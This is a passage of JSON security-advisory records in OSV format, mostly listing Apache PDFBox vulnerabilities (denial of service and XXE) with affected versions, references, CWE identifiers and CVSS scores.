"https://nvd.nist.gov/vuln/detail/CVE-2024-52046" }, { "type": "PACKAGE", "url": "https://github.com/apache/mina" }, { "type": "WEB", "url": "https://lists.apache.org/thread/4wxktgjpggdbto15d515wdctohb0qmv8" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250103-0001" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/12/25/1" } ], "database_specific": { "cwe_ids": [ "CWE-502", "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2024-12-26T15:59:46Z", "nvd_published_at": "2024-12-25T10:15:05Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2h3j-m7gr-25xj", "published": "2021-06-16T17:56:46Z", "modified": "2024-03-15T05:17:16.776669Z", "aliases": [ "CVE-2021-27807" ], "summary": "Excessive Iteration Denial of Service in Apache PDFBox", "details": "A carefully crafted PDF file can trigger an infinite loop while loading the file. 
This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.23" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-2h3j-m7gr-25xj/GHSA-2h3j-m7gr-25xj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27807" }, { "type": "WEB", "url": "https://github.com/apache/pdfbox/commit/5c5a837140fbb4ef78bb5ef9f29ad537c872c83e" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://svn.apache.org/viewvc?view=revision\u0026revision=1886911" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4717f902f8bc36d47b3fa978552a25e4ed3ddc2fffb52b94fbc4ab36@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r043edc5dcf9199f7f882ed7906b41cb816753766e88b8792dbf319a9@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/PDFBOX-4892" }, { "type": "PACKAGE", "url": "https://github.com/apache/pdfbox" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/19/9" } ], "database_specific": { "cwe_ids": [ "CWE-834" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T18:45:15Z", "nvd_published_at": "2021-03-19T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4c32-xmgj-2g98", "published": "2018-10-17T18:22:15Z", "modified": "2023-11-08T03:58:24.099687Z", "aliases": [ "CVE-2016-2175" ], "summary": "High severity vulnerability that affects org.apache.pdfbox:pdfbox", "details": "Apache PDFBox before 1.8.12 and 2.x before 2.0.1 does not properly initialize the XML parsers, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted PDF.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.8.12" } ] } ], "versions": [ "0.8.0-incubating", "0.8.0-incubator", "1.0.0", "1.1.0", "1.2.0", "1.2.1", "1.3.1", "1.4.0", "1.5.0", "1.6.0", "1.7.0", "1.7.1", "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4c32-xmgj-2g98/GHSA-4c32-xmgj-2g98.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", 
"purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.1" } ] } ], "versions": [ "2.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-4c32-xmgj-2g98/GHSA-4c32-xmgj-2g98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2175" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-4c32-xmgj-2g98" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ad5fbc86c1d1821ae1b963e8561ab6d6a5f66b2848e84f5a31477f54@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201605.mbox/%3C83a03bcf-f86b-4688-37b5-615c080291d8@apache.org%3E" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/137214/Apache-PDFBox-1.8.11-2.0.0-XML-Injection.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0179.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0248.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0249.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2017-0272.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1739564" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1739565" }, { "type": "WEB", "url": "http://www.debian.org/security/2016/dsa-3606" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/538503/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/90902" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:58:03Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": 
"GHSA-6vqp-h455-42mr", "published": "2021-05-13T22:30:13Z", "modified": "2024-03-15T05:36:23.028589Z", "aliases": [ "CVE-2021-27906" ], "summary": "Uncontrolled Memory Allocation in Apache PDFBox", "details": "A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.23" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-6vqp-h455-42mr/GHSA-6vqp-h455-42mr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27906" }, { "type": "WEB", "url": "https://github.com/apache/pdfbox/commit/8c47be1011c11dc47300faecffd8ab32fba3646f" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf35026148ccc0e1af133501c0d003d052883fcc65107b3ff5d3b61cd%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf78aef4793362e778e21e34328b0456e302bde4b7e74f229df0ee04@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r64982b768c8a2220b07aaf813bd099a9863de0d13eb212fd4efe208f@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/PDFBOX-5112" }, { "type": "PACKAGE", "url": "https://github.com/apache/pdfbox" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/03/19/10" } ], "database_specific": { "cwe_ids": [ "CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-03-22T18:36:26Z", "nvd_published_at": "2021-03-19T16:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7grw-6pjh-jpc9", "published": "2021-06-15T15:54:29Z", "modified": "2024-03-08T05:18:50.960251Z", "aliases": [ "CVE-2021-31812" ], "summary": "Infinite Loop in Apache PDFBox", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an infinite loop while loading the file. 
This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-7grw-6pjh-jpc9/GHSA-7grw-6pjh-jpc9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31812" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": 
"WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf251f6c358087107f8c23473468b279d59d50a75db6b4768165c78d3@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ab0ce69ce8aaff0773b8c1036438387ce004c2afc6f066626e205e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/1" } ], "database_specific": { "cwe_ids": [ "CWE-834", "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:41:33Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": 
"MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9jj-3wvg-q65h", "published": "2019-07-05T21:12:54Z", "modified": "2024-02-16T08:10:43.804701Z", "aliases": [ "CVE-2019-0228" ], "summary": "Vulnerability that affects org.apache.pdfbox:pdfbox", "details": "Apache PDFBox 2.0.14 does not properly initialize the XML parser, which allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XFDF.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.14" }, { "fixed": "2.0.15" } ] } ], "versions": [ "2.0.14" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-c9jj-3wvg-q65h/GHSA-c9jj-3wvg-q65h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0228" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c9jj-3wvg-q65h" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1a3756557f8cb02790b7183ccf7665ae23f608a421c4f723113bca79@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8a19bd6d43e359913341043c2a114f91f9e4ae170059539ad1f5673c@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bc8db1bf459f1ad909da47350ed554ee745abe9f25f2b50cad4e06dd@%3Cserver-dev.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/be86fcd7cd423a3fe6b73a3cb9d7cac0b619d0deb99e6b5d172c98f4@%3Ccommits.tika.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a2141abeddae66dd57025f1681c8425834062b7c0c7e0b1d830a95d@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r32b8102392a174b17fd19509a9e76047f74852b77b7bf46af95e45a2@%3Cserver-dev.james.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6HKVPTJWZGUB4MH4AAOWMRJHRDBYFHGJ" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/POPOGHJ5CVMUVCRQU7APBAN5IVZGZFDX" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:58Z", "nvd_published_at": "2019-04-17T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fg3j-q579-v8x4", "published": "2021-06-15T15:54:32Z", "modified": "2024-03-08T05:34:54.801835Z", "aliases": [ "CVE-2021-31811" ], "summary": "Uncontrolled memory consumption", "details": "In Apache PDFBox, a carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. 
This issue affects Apache PDFBox version 2.0.23 and prior 2.0.x versions.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox-parent", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox-parent" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.24" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/06/GHSA-fg3j-q579-v8x4/GHSA-fg3j-q579-v8x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-31811" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MDJKJQOMVFDFIDS27OQJXNOYHV2O273D" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7HHWJRFXZ3PTKLJCOM7WJEYZFKFWMNSV" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfe26bcaba564deb505c32711ba68df7ec589797dcd96ff3389a8aaba@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf937c2236e6c79cdb99f76a70690dd345e53dbe0707cb506a202e43e@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e@%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3bd16f0cc8f1fbda46b06a4b8241cd417f71402809baa81548fc20e%40%3Cusers.pdfbox.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0cacd3fb337cdf8469853913ed2b4ddd8f8bfc52ff0ddbe61c1dfba@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd4b6db6c3b8ab3c70f1c3bbd725a40920896453ffc2744ade6afd9fb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2090789e4dcc2c87aacbd87d5f18e2d64dcb9f6eb7c47f5cf7d293cb@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r179cc3b6822c167702ab35fe36093d5da4c99af44238c8a754c6860f@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r143fd8445e0e778f4a85187bd79438630b96b8040e9401751fdb8aea@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r132e9dbbe0ebdc08b39583d8be0a575fdba573d60a42d940228bceff@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/06/12/2" } ], "database_specific": { "cwe_ids": [ "CWE-770", 
"CWE-789" ], "github_reviewed": true, "github_reviewed_at": "2021-06-14T19:39:19Z", "nvd_published_at": "2021-06-12T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gx96-vgf7-hwfg", "published": "2018-10-17T18:22:29Z", "modified": "2024-02-16T08:14:19.885368Z", "aliases": [ "CVE-2018-11797" ], "summary": "In Apache PDFBox a carefully crafted PDF file can trigger an extremely long running computation", "details": "In Apache PDFBox 1.8.0 to 1.8.15 and 2.0.0RC1 to 2.0.11, a carefully crafted PDF file can trigger an extremely long running computation when parsing the page tree.", "affected": [ { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.8.0" }, { "fixed": "1.8.16" } ] } ], "versions": [ "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.12", "1.8.13", "1.8.14", "1.8.15", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-gx96-vgf7-hwfg/GHSA-gx96-vgf7-hwfg.json" } }, { "package": { "name": "org.apache.pdfbox:pdfbox", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.pdfbox/pdfbox" }, "ranges": [ { "type": 